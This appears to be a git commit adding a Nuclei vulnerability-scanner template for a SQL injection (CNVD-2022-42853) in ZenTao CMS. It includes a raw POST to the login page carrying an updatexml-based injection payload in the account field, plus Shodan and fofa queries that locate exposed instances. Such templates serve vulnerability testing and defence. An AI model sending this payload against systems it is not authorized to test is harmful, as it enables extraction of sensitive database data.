commit
2ce97aec55
|
@ -0,0 +1,35 @@
|
|||
id: CNVD-2022-42853
|
||||
|
||||
info:
|
||||
name: ZenTao CMS - SQL Injection
|
||||
author: ling
|
||||
severity: high
|
||||
description: |
|
||||
Zen Tao has a SQL injection vulnerability. Attackers can exploit the vulnerability to obtain sensitive database information.
|
||||
reference:
|
||||
- https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"zentao"
|
||||
fofa-query: "Zentao"
|
||||
tags: cnvd,cnvd2022,zentao,sqli
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /zentao/user-login.html HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}/zentao/user-login.html
|
||||
|
||||
account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'c8c605999f3d8352d7bb792cf3fdb25'
|
Loading…
Reference in New Issue